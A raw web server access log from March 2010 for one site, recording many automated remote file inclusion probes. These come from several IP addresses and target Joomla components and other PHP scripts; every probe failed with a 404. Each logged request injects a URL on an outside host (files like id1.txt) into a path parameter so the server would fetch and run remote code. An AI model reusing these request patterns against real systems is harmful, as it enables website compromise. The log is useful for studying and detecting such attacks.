200.93.147.154 - - [11/Mar/2010:09:01:51 -0800] "GET /logs/access.log/?board_skin_path=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:18 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:18 -0800] "GET /logs/access_090901.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:18 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:19 -0800] "GET /delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:19 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:30 -0800] "GET /logs/access_090901.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:30 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:09:02:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:51 -0800] "GET /delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:51 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.103.72.130 - - [11/Mar/2010:09:02:53 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.mokpokick.com/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:03:23 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:03:23 -0800] "GET /include/lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:03:23 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:06:21 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:06:23 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:08:00 -0800] "GET /logs/access.log/?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:09:24 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:09:26 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:09:11:09 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:09:11:09 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:09:11:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:12:06 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:12:09 -0800] "GET /config/dbutil.bck.php?confdir=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:12:13 -0800] "GET /logs//config/dbutil.bck.php?confdir=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:12:42 -0800] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:12:42 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:12:42 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:04 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:04 -0800] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:08 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:08 -0800] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:08 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:08 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:09:13:35 -0800] "GET /logs/access_091228.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:55 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:55 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:55 -0800] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:59 -0800] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:59 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:13:59 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:09:14:04 -0800] "GET /logs/access_091228.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:09:14:04 -0800] "GET /logs/access_091228.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
194.63.235.156 - - [11/Mar/2010:09:14:04 -0800] "GET /logs/access_091228.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:09 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:09 -0800] "GET /logs/access_091228.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:32 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:32 -0800] "GET /logs/access_091228.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:14:47 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:14:47 -0800] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:14:47 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:14:54 -0800] "GET /home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:15:01 -0800] "GET /logs/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:15:01 -0800] "GET /logs/access_100225.log%20%20/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:15:13 -0800] "GET /logs/access_100121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:15:32 -0800] "GET /logs/access_100121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:15:37 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:09 -0800] "GET /logs/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:11 -0800] "GET /home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:15 -0800] "GET /logs/access_100225.log%20%20/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:16:16 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:46 -0800] "GET /logs/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:56 -0800] "GET /logs/access_100225.log%20%20/home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:16:57 -0800] "GET /home.php?pagina=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:17:35 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:20:24 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:37 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:38 -0800] "GET /logs/access_100121.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:38 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:48 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:49 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:20:50 -0800] "GET /logs/access_100121.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dangno.co.kr/bbs/data/F1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:20:52 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:22:14 -0800] "GET /config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:09:22:27 -0800] "GET /mygallerybrowser.php?myPath=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:09:22:27 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:09:22:27 -0800] "GET /logs/access_091228.log%20%20/mygallerybrowser.php?myPath=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:23:15 -0800] "GET /logs/access_100121.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:09:23:26 -0800] "GET /logs/access_100121.log%20%20/mygallerybrowser.php?myPath=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:23:51 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.201.102.68 - - [11/Mar/2010:09:24:25 -0800] "GET /logs/access_100121.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:25:11 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:26:02 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:26:02 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:09:27:06 -0800] "GET /logs/access.log/mygallerybrowser.php?myPath=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:09:27:09 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:27:15 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:27:15 -0800] "GET /config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:27:15 -0800] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:09:31:05 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:09:31:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:09:31:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:09:31:08 -0800] "GET /logs/access_100121.log%20%20//config/dbutil.bck.php?confdir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:33:54 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:33:54 -0800] "GET /logs/access_091228.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:36:13 -0800] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:09:36:37 -0800] "GET /logs/access_100121.log%20%20//config/dbutil.bck.php?confdir=%20http://www.hyonsvc.co.kr//bbs//icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:09:37:24 -0800] "GET /logs/access_091228.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:09:37:39 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
